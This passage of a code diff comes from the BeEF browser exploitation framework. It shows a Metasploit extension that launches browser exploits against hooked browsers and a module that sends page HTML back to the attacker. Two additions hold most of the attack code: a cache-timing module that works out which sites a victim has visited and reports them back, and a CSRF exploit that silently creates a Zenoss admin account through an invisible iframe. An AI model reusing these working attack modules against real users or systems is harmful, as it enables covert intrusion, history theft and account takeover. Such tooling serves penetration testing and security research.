                 print_debug "Attempting to use Metasploit exploits cache file"
                 raw = File.read("#{path}msf-exploits.cache")
                 begin
-                    msf_module_config = YAML.load(raw)
+                  msf_module_config = YAML.load(raw)
                 rescue => e
-                   puts e 
+                  puts e
                 end
                 count = 1
-                msf_module_config.each{|k,v|
-                    BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
-                    BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k,nil])
-                    BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
-                    print_over "Loaded #{count} Metasploit exploits."
-                    count += 1
+                msf_module_config.each { |k, v|
+                  BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
+                  BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k, nil])
+                  BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
+                  print_over "Loaded #{count} Metasploit exploits."
+                  count += 1
                 }
                 print "\r\n"
-            else
+              else
                 msf_modules = msf.call('module.exploits')
                 count = 1
-                msf_modules['modules'].each{|m|
-                    next if not m.include? "/browser/"
-                    m_details = msf.call('module.info', 'exploit', m)
-                    if m_details
-                        key = 'msf_'+m.split('/').last
-                        # system currently doesn't support multilevel categories
-                        #categories = ['Metasploit']
-                        #m.split('/')[0...-1].each{|c| 
-                        #    categories.push(c.capitalize)
-                        #}
-                        msf_module_config[key] = {
-                            'enable'=> true,
-                            'msf'=> true,
-                            'msf_key' => m,
-                            'name'=> m_details['name'],
-                            'category' => 'Metasploit',
-                            'description'=> m_details['description'],
-                            'authors'=> m_details['references'],
-                            'path'=> path,
-                            'class'=> 'Msf_module'
-                        }
-                        BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
-                        BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key,nil])
-                        BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
-                        print_over "Loaded #{count} Metasploit exploits."
-                        count += 1
-                    end
+                msf_modules['modules'].each { |m|
+                  next if not m.include? "/browser/"
+                  m_details = msf.call('module.info', 'exploit', m)
+                  if m_details
+                    key = 'msf_'+m.split('/').last
+                    # system currently doesn't support multilevel categories
+                    #categories = ['Metasploit']
+                    #m.split('/')[0...-1].each{|c|
+                    #    categories.push(c.capitalize)
+                    #}
+                    msf_module_config[key] = {
+                        'enable'=> true,
+                        'msf'=> true,
+                        'msf_key' => m,
+                        'name'=> m_details['name'],
+                        'category' => 'Metasploit',
+                        'description'=> m_details['description'],
+                        'authors'=> m_details['references'],
+                        'path'=> path,
+                        'class'=> 'Msf_module'
+                    }
+                    BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
+                    BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key, nil])
+                    BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
+                    print_over "Loaded #{count} Metasploit exploits."
+                    count += 1
+                  end
                 }
                 print "\r\n"
                 File.open("#{path}msf-exploits.cache", "w") do |f|
-                    f.write(msf_module_config.to_yaml)
-                    print_debug "Wrote Metasploit exploits to cache file"
+                  f.write(msf_module_config.to_yaml)
+                  print_debug "Wrote Metasploit exploits to cache file"
                 end
+              end
+              BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
             end
-            BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
-        end
-    end
+          end
 
-    # Get module options + payloads when the beef framework requests this information
-    def self.get_options(mod)
-        msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
-        msf = BeEF::Extension::Metasploit::RpcClient.instance                
-        if msf_key != nil and msf.login
-            msf_module_options = msf.call('module.options', 'exploit', msf_key)
-	    com = BeEF::Core::Models::CommandModule.first(:name => mod )
-            if msf_module_options
+          # Get module options + payloads when the beef framework requests this information
+          def self.get_options(mod)
+            msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
+            msf = BeEF::Extension::Metasploit::RpcClient.instance
+            if msf_key != nil and msf.login
+              msf_module_options = msf.call('module.options', 'exploit', msf_key)
+              com = BeEF::Core::Models::CommandModule.first(:name => mod)
+              if msf_module_options
                 options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
-		options << { 'name' => 'mod_id', 'id' => 'mod_id' , 'type' => 'hidden', 'value' => com.id}
+                options << {'name' => 'mod_id', 'id' => 'mod_id', 'type' => 'hidden', 'value' => com.id}
                 msf_payload_options = msf.call('module.compatible_payloads', msf_key)
                 if msf_payload_options
-                    options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
-                    return options
+                  options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
+                  return options
                 else
-                    print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
+                  print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
                 end
-            else
+              else
                 print_error "Unable to retrieve metasploit options for exploit: #{msf_key}"
+              end
             end
-        end
-    end
+          end
 
-    # Execute function for all metasploit exploits
-    def self.override_execute(mod, hbsession, opts)
-        msf = BeEF::Extension::Metasploit::RpcClient.instance
-        msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
-	msf_opts = {}
+          # Execute function for all metasploit exploits
+          def self.override_execute(mod, hbsession, opts)
+            msf = BeEF::Extension::Metasploit::RpcClient.instance
+            msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
+            msf_opts = {}
 
-	opts.each { |opt|
-		next if ['e','ie_session','and_module_id'].include? opt['name']
-		msf_opts[opt["name"]] = opt["value"]
-	}
+            opts.each { |opt|
+              next if ['e', 'ie_session', 'and_module_id'].include? opt['name']
+              msf_opts[opt["name"]] = opt["value"]
+            }
 
-        if msf_key != nil and msf.login
-            # Are the options correctly formatted for msf?
-            # This call has not been tested
-            msf.call('module.execute', 'exploit', msf_key, msf_opts)
-        end
+            if msf_key != nil and msf.login
+              # Are the options correctly formatted for msf?
+              # This call has not been tested
+              msf.call('module.execute', 'exploit', msf_key, msf_opts)
+            end
 
-        hb = BeEF::HBManager.get_by_session(hbsession)
-        if not hb
-            print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
-            return false
-        end
+            hb = BeEF::HBManager.get_by_session(hbsession)
+            if not hb
+              print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
+              return false
+            end
 
-        bopts = []
-	uri = ""
-	if msf_opts['SSL']
-		uri += "https://"
-	else
-		uri += "http://"
-	end
-	config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
-        uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
+            bopts = []
+            uri = ""
+            if msf_opts['SSL']
+              uri += "https://"
+            else
+              uri += "http://"
+            end
+            config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
+            uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
 
 
-	bopts <<   { :sploit_url => uri } 
-        c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
-            :hooked_browser_id => hb.id,
-            :command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
-            :creationdate => Time.new.to_i
-          ).save
+            bopts << {:sploit_url => uri}
+            c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
+                                                :hooked_browser_id => hb.id,
+                                                :command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
+                                                :creationdate => Time.new.to_i
+            ).save
 
-        # Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
-        # which exploits where executed against which hooked browsers
-        return true
-    end
+            # Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
+            # which exploits where executed against which hooked browsers
+            return true
+          end
 
-    # Get module options + payloads when the beef framework requests this information
-    def self.get_payload_options(mod,payload)
-        msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
+          # Get module options + payloads when the beef framework requests this information
+          def self.get_payload_options(mod, payload)
+            msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
 
-        msf = BeEF::Extension::Metasploit::RpcClient.instance                
-        if msf_key != nil and msf.login
-            msf_module_options = msf.call('module.options', 'payload', payload)
-	     
-	    com = BeEF::Core::Models::CommandModule.first(:name => mod )
-            if msf_module_options
+            msf = BeEF::Extension::Metasploit::RpcClient.instance
+            if msf_key != nil and msf.login
+              msf_module_options = msf.call('module.options', 'payload', payload)
+
+              com = BeEF::Core::Models::CommandModule.first(:name => mod)
+              if msf_module_options
                 options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
                 return options
-            else
+              else
                 print_error "Unable to retrieve metasploit payload options for exploit: #{msf_key}"
+              end
             end
+          end
         end
-     end
+      end
+    end
   end
 end
-end
-end
-end

extensions/qrcode/qrcode.rb

@@ -25,7 +25,7 @@ module Qrcode
       require 'uri'
       
       configuration = BeEF::Core::Configuration.instance
-      BeEF::Extension::Console::Banners.interfaces.each do |int|
+      BeEF::Core::Console::Banners.interfaces.each do |int|
         print_success "QRCode images available for interface: #{int}"
         data = ""
         configuration.get("beef.extension.qrcode.target").each do |target|

extensions/xssrays/handler.rb

@@ -77,7 +77,7 @@ module BeEF
             )
             xssrays_detail.save
           end
-          print_info("[XSSRAYS] Received ray from HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
+          print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
           print_debug("[XSSRAYS] Ray info: \n #{@request.query_string}")
         end
 

install

@@ -36,3 +36,4 @@ puts "\nRun bundler in your BeEF folder: bundle install"
 
 puts "\nRun BeEF: ./beef"
 
+#Testing fork regroup

modules/browser/get_page_html/command.js

@@ -16,18 +16,17 @@
 beef.execute(function() {
 
 	try {
-		var html_head = escape(document.head.innerHTML.toString());
+		var html_head = document.head.innerHTML.toString();
 	} catch (e) {
 		var html_head = "Error: document has no head";
 	}
 	try {
-		var html_body = escape(document.body.innerHTML.toString());
+		var html_body = document.body.innerHTML.toString();
 	} catch (e) {
 		var html_body = "Error: document has no body";
 	}
 
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'body='+html_body);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body);
 
 });
 

modules/browser/get_page_html/module.rb

@@ -17,7 +17,8 @@ class Get_page_html < BeEF::Core::Command
 
   def post_execute
     content = {}
-    content['html'] = @datastore['html']
+    content['head'] = @datastore['head']
+    content['body'] = @datastore['body']
     save content
   end
 

modules/browser/get_visited_domains/command.js

@@ -0,0 +1,344 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+var hidden_iframe = beef.dom.createInvisibleIframe();
+hidden_iframe.setAttribute('id','f');
+hidden_iframe.setAttribute('name','f');		
+hidden_iframe.setAttribute('src','about:blank');		
+hidden_iframe.setAttribute('style','opacity: 0.1');		
+
+var results = "";
+var tries = 0;
+
+var isIE = 0;
+var isFF = 0;
+
+/*******************************
+ * SUB-MS TIMER IMPLEMENTATION *
+ *******************************/
+var cycles = 0;
+var exec_next = null;
+
+function timer_interrupt() {
+  cycles++;
+  if (exec_next) {
+    var cmd = exec_next;
+    exec_next = null;
+    cmd();
+  }
+}
+
+
+if (beef.browser.isFF() == 1) {
+	window.addEventListener('message', timer_interrupt, false);
+
+	/****************
+	 * SCANNED URLS *
+	 ****************/
+	var targets = [
+	  { 'category': 'Social networks' },
+	  { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
+									  'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
+									  'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
+	  { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
+	
+	  { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
+									 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
+	  { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
+	  { 'category': 'Content platforms' },
+	  { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
+	  { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
+	  { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
+	  { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
+	  { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
+	  { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
+	  { 'category': 'Online media' },
+	  { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
+	  { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
+								 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
+	  { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
+	  { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
+	  { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
+	  { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
+	  { 'category': 'Commerce' },
+	  { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
+										 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
+	  { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
+	  { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
+	  { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
+	  { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
+      { 'category': 'Coding' },
+      { 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
+      { 'category': 'Security' },
+      { 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
+      { 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
+      { 'category': 'Email' },
+      { 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
+	];
+	/*************************
+	 * CONFIGURABLE SETTINGS *
+	 *************************/
+	var TIME_LIMIT = 5;
+	var MAX_ATTEMPTS = 2;	
+}
+if (beef.browser.isIE() == 1) {
+	/****************
+	 * SCANNED URLS *
+	 ****************/
+	var targets = [
+	  { 'category': 'Social networks' },
+	  { 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png',
+									  'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] },
+	  { 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico',
+									 'https://twitter.com/phoenix/favicon.ico' ] },
+	  { 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
+									  'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png',
+									  'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] },
+	  { 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] },
+	  { 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] },
+	  { 'category': 'Content platforms' },
+	  { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] },
+	  { 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] },
+	  { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] },
+	  { 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] },
+	  { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] },
+	  { 'category': 'Online media' },
+	  { 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] },
+	  { 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif',
+								 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] },
+	  { 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico',
+									  'http://a.fsdn.com/sd/logo_w_l.png' ] },
+	  { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] },
+	  { 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] },
+	  { 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] },
+	  { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ },
+	  { 'category': 'Commerce' },
+	  { 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] },
+	  { 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] },
+	  { 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] },
+	  { 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] },
+	  { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] }
+	];
+	/*************************
+	 * CONFIGURABLE SETTINGS *
+	 *************************/
+	
+	var TIME_LIMIT = 1; 
+	var MAX_ATTEMPTS = 1;	
+}
+
+
+function sched_call(fn) {
+  exec_next = fn;
+  window.postMessage('123', '*');
+}
+
+
+/**********************
+ * MAIN STATE MACHINE *
+ **********************/
+var log_area;
+var target_off = 0;
+var attempt = 0;
+var confirmed_visited = false;
+var current_url, current_name;
+var wait_cycles;
+var frame_ready = false;
+var start, stop, urls;
+
+/* The frame was just pointed to data:... at this point. Initialize a new test, giving the
+   frame some time to fully load. */
+function perform_check() {
+  wait_cycles = 0;
+  if (beef.browser.isIE() == 1) {
+  	setTimeout(wait_for_read, 0);
+  }
+  if (beef.browser.isFF() == 1) {
+  	setTimeout(wait_for_read, 1);
+  }
+  
+}
+
+
+/* Confirm that data:... is loaded correctly. */
+function wait_for_read() {
+  if (wait_cycles++ > 100) {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
+    return;
+  }
+  if (beef.browser.isFF() == 1) {
+	  if (!frame_ready) {
+		setTimeout(wait_for_read, 1);
+	  } else {
+		document.getElementById('f').contentWindow.stop();
+		setTimeout(navigate_to_target, 1);
+	  }
+  }
+  if (beef.browser.isIE() == 1) {
+	  try{
+ 	    if (frames['f'].location.href != 'about:blank') throw 1;
+		//if(document.getElementById('f').contentWindow.location.href  != 'about:blank') throw 1;
+		document.getElementById("f").src ='javascript:"<body onload=\'parent.frame_ready = true\'>"';
+		setTimeout(wait_for_read2, 0);
+	  } catch (e) {
+		setTimeout(wait_for_read, 0);
+	  }	
+   }
+}
+
+function wait_for_read2() {
+  if (wait_cycles++ > 100) {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
+    return;
+  }
+  if (!frame_ready) {
+    setTimeout(wait_for_read2, 0);
+  } else {
+    setTimeout(navigate_to_target, 1);
+  }
+}
+
+
+
+/* Navigate the frame to the target URL. */
+function navigate_to_target() {
+  cycles = 0;
+  if (beef.browser.isFF() == 1) {
+	  sched_call(wait_for_noread);
+  } 
+  if (beef.browser.isIE() == 1) {
+	  setTimeout(wait_for_noread, 0);
+  }
+  urls++;
+  document.getElementById("f").src = current_url;
+}
+
+
+/* The browser is now trying to load the destination URL. Let's see if
+   we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache
+   hit. If not, seems like cache miss. In both cases, the navigation
+   will be aborted by maybe_test_next(). */
+
+function wait_for_noread() {
+  try {
+	if (beef.browser.isIE() == 1) {
+		if (frames['f'].location.href == undefined){
+			confirmed_visited = true;
+			throw 1;
+		}
+		if (cycles++ >= TIME_LIMIT) {
+		  maybe_test_next();
+		  return;
+		}		
+		setTimeout(wait_for_noread, 0);
+ 	  }
+ 	if (beef.browser.isFF() == 1) {
+		if (document.getElementById('f').contentWindow.location.href == undefined) 
+		{
+			confirmed_visited = true;
+			throw 1;
+		}
+  		if (cycles >= TIME_LIMIT) {
+     		maybe_test_next();
+      		return;
+    	}	
+    	sched_call(wait_for_noread);    	
+	}
+  } catch (e) {
+    confirmed_visited = true;
+    maybe_test_next();
+  }
+}
+
+function maybe_test_next() {
+  frame_ready = false;
+  if (beef.browser.isFF() == 1) {
+	  document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
+  }
+  if (beef.browser.isIE() == 1) {
+  	   document.getElementById("f").src = 'about:blank';
+  }
+  if (target_off < targets.length) {
+    if (targets[target_off].category) {
+      //log_text(targets[target_off].category + ':', 'p', 'category');
+      target_off++;
+    }
+    if (confirmed_visited) {
+      log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited');
+    }
+    if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) {
+      if (!confirmed_visited)
+        //continue;
+        log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited');
+      confirmed_visited = false;
+      target_off++;
+      attempt = 0;
+      maybe_test_next();
+    } else {
+      current_url = targets[target_off].urls[attempt % targets[target_off].urls.length];
+      current_name = targets[target_off].name;
+      attempt++;
+      perform_check();
+    }
+  }
+}
+
+
+/* Just a logging helper. */
+function log_text(str, type, cssclass) {
+  results+="<br>";
+  results+=str;
+  //alert(str);
+  if(target_off==(targets.length-1)){
+  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
+	setTimeout(reload,3000);
+  }
+}
+
+function reload(){
+	//window.location.href=window.location.href;
+	window.location.reload();
+}
+
+/* Decides what to do next. May schedule another attempt for the same target,
+   select a new target, or wrap up the scan. */
+
+
+
+/* The handler for "run the test" button on the main page. Dispenses
+   advice, resets state if necessary. */
+function start_stuff() {
+  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
+  	  target_off = 0;
+	  attempt = 0;
+	  confirmed_visited = false;
+	  urls = 0;
+	  results = "";
+	  maybe_test_next();
+  }
+  else {
+  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
+  }  
+}
+
+
+beef.execute(function() { 
+   urls = undefined;
+   exec_next = null;
+   start_stuff();
+});
+
+	

modules/browser/get_visited_domains/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+         get_visited_domains:
+            enable: true
+            category: "Browser"
+            name: "Get Visited Domains"
+            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
+            authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
+            target:
+                working: ["FF","IE"]
+                not_working: ["O","C","S"]

modules/browser/get_visited_domains/module.rb

@@ -13,23 +13,13 @@
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
-module BeEF
-module Core
-module Models
 
-  class DynamicPayloads
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamicpayloads'
-  
-    property :id, Serial
-    property :name, Text, :lazy => false
-  
-  	has n, :dynamic_payload_info
-  
+class Get_visited_domains < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['results'] = @datastore['results']
+    save content
   end
 
 end
-end
-end

modules/browser/rickroll/command.js

@@ -19,7 +19,7 @@ beef.execute(function() {
 	$j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
 	$j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
 	
-	$j('body').html('<object width="100%" height="100%"><param name="movie" value="http://www.youtube.com/v/XZ5TajZYW6Y?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/XZ5TajZYW6Y?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="100%"></object>');
+	$j('body').html('<object width="100%" height="100%"><param name="movie" value="http://www.youtube.com/v/oHg5SJYRHA0?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/oHg5SJYRHA0?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="100%"></object>');
 	
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful");
 });

modules/exploits/zenoss_add_user_csrf/command.js

@@ -0,0 +1,33 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var base = '<%= @base %>'; 
+  var user_level = '<%= @user_level %>';
+  var username = '<%= @username %>';
+  var password = '<%= @password %>';
+
+  var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
+  zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(zenoss_add_user_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/zenoss_add_user_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
